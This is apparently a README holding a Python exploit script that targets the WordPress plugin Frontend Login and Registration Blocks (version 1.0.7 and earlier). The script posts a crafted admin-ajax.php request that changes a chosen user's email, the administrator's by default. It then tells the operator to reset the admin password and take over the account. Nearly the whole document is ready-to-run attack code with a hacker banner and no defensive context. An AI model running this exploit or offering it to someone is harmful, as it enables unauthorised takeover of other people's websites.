README.md
Rendering markdown...
import requests
import argparse
import sys
#By: Khaled Alenazi (Nxploited)
# Banner
def print_banner():
banner = """
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@@ @@@@@@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@@@ @@@@@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ !@@ @@! @@@@ !@@
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ !@! !@! @!@!@ !@!
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ !!@@!@! @!@ @! !@! !!@@!!
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! @!!@!!!! !@!!! !!! @!!@!!!
:!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !:! !:! !!:! !!! !:!
:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: !:! :!: !:! !:!
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: :::: ::: ::::::: :: :::: ::
:: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : :: : : : : : : :: : :
By: Khaled Alenazi (Nxploited)
"""
print(banner)
def disable_ssl():
requests.packages.urllib3.disable_warnings()
def create_session():
session = requests.Session()
session.verify = False
session.headers.update({'User-Agent': get_user_agent()})
return session
def get_user_agent():
return "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 # By: Khaled Alenazi (Nxploited)"
def parse_arguments():
parser = argparse.ArgumentParser(
description="Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation"
)
parser.add_argument("--url", "-u", required=True, help="Target URL, e.g., http://192.168.100.74:888/wordpress")
parser.add_argument("--user_id", "-id", default="1", help="User ID to target (default: 1)")
parser.add_argument("--mail", "-mail", default="[email protected]", help="Email to set (default: [email protected])")
return parser.parse_args()
def build_payload(user_id, email):
payload = {
'action': 'flrblocksusersettingsupdatehandle',
'user_id': user_id,
'flr-blocks-email-update': email
}
return payload
def send_exploit(session, url, payload):
try:
response = session.post(url + "/wp-admin/admin-ajax.php", data=payload)
return response
except Exception as e:
print(f"Error sending request: {e}")
sys.exit(1)
def handle_response(response):
if response.status_code == 200:
if response.text.strip() != "0":
print(f"Exploit successful! Response: {response.text}")
print("Final Step: Go to the Forgot Password page and reset the admin password using the new email!")
else:
print("Exploit failed. Server responded with '0' — likely rejected request or missing parameters.")
else:
print(f"Exploit failed. HTTP Status: {response.status_code}")
print(f"Response: {response.text}")
def main():
print_banner()
disable_ssl()
args = parse_arguments()
session = create_session()
payload = build_payload(args.user_id, args.mail)
response = send_exploit(session, args.url, payload)
handle_response(response)
if __name__ == "__main__":
main()